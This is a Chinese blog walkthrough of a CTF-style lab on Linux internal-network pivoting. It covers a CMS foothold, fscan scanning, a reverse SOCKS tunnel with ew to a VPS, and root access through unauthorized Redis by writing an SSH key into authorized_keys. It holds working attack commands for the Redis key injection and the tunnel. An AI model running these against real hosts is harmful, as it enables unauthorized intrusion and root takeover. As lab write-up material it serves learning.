0x00 内网漫游-起源
靶场遇见一道内网题目。地址:
cmseasy免费企业网站程序是国内首款免费营销型的企业网站系统 - Powered by CmsEasy
之前虽然学过一段时间windows下内网漫游,但是年少不经事,忘记太多,加上linux系统内网漫游从未接触,此题难度简单,所以记录学习。
0x01 内网漫游-信息收集
前台利用cms漏洞成功获得服务器权限,进入到内网漫游阶段。
一番信息收集,发现是linux系统,此时为www权限,使用searchexploit未发现漏洞,提权这个想法暂且搁置
github下载fscan的linux版本来探测内网,执行成功在当前目录生成result.txt文件,发现192.168.0.3存在6379端口,根据经验,基本判定靶场是希望通过redis未授权getshell内网主机。
./fscan -h 192.168.0.1/20
0x02 内网漫游-代理转发
个人vps是centos7,选用ew、proxychains两款工具代理流量,工具自行安装,安装过程自行百度。
这里有一个注意点,因直接在vps上进行操作,所以IP地址只需要修改为本地127.0.0.1,端口指定10800,同时需要注意把原本的socks4代理给注释掉,如果不注释会导致ew代理失败,这个坑让我卡住三天。
vi /etc/proxychains.conf 
设置ew代理,这里端口10800与上面相呼应。
使用ew反代,端口可自行调整
vps本机
ew -s rcsocks -l 10800 -e 8888
目标机
ew -s rssocks -d vps-ip -e 8888 可以看到socks代理已经建立。
配置完成,进行测试,使用curl请求内网存活的web网页发现已经成功访问,这时就可以正式开始内网漫游。
如果socks代理建立成功,下面会有数据交互,如果下面没有数据交互就说明代理建立失败,通过这一点可以判断操作成没成功。
redis-cli安装报错
centos7安装redis-cli遇到make报错问题,踩了不少坑,给出链接。
安装redis中执行make时出错及解决方案_疾风盲豪-亚青的博客-CSDN博客_make redis
0x03 通过redis未授权getshell
根据经验判断,192.168.0网段里192.168.0.3开放redis服务,之前个人文章写过两种方式,链接如下:
Redis未授权漏洞环境搭建复现问题解决_身高两米不到的博客-CSDN博客
rsa当时没有写,本次正好需使用rsa密钥去获得权限,命令如下所示。
如若失败可以参考链接,写的很详细:Redis未授权访问漏洞复现 - 雨中落叶 - 博客园
cd /root/.ssh/
ssh-keygen -t rsa
(echo -e "\n";cat id_rsa.pub;echo -e "\n") > test.txt
cat test.txt | proxychains4 redis-cli -h 192.168.0.3 -x set pub
proxychains4 redis-cli -h 192.168.0.3
config set dir /root/.ssh/
config set dbfilename "authorized_keys"
save
exit
proxychains4 ssh -i id_rsa root@192.168.0.3
成功连入主机,redis未授权成功,得到flag。
0x04 正常情况下内网漫游思路
其实在正常情况下,进入往往要使用burpsuite、sqlmap等工具对内网网站攻击。本机电脑使用vmware打开kali虚机,修改proxychains配置文件,注释掉原本的socks4,配置socks5为公网IP
vi /etc/proxychains4.conf
打开firefox设置代理
proxychains启用burpsuite,这里的思路是让firefox流量走burpsuite,然后burpsuite流量走ew,这样就可以通过burpsuite进行渗透。
之前使用的fscan,信息搜集就产生巨大作用。
proxychains4 burpsuite以http://192.168.0.1:8006为例,就可以把目标机的内网网页代理到本地,下面就和正常的渗透测试一样,对其网页进行渗透即可。
1151
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
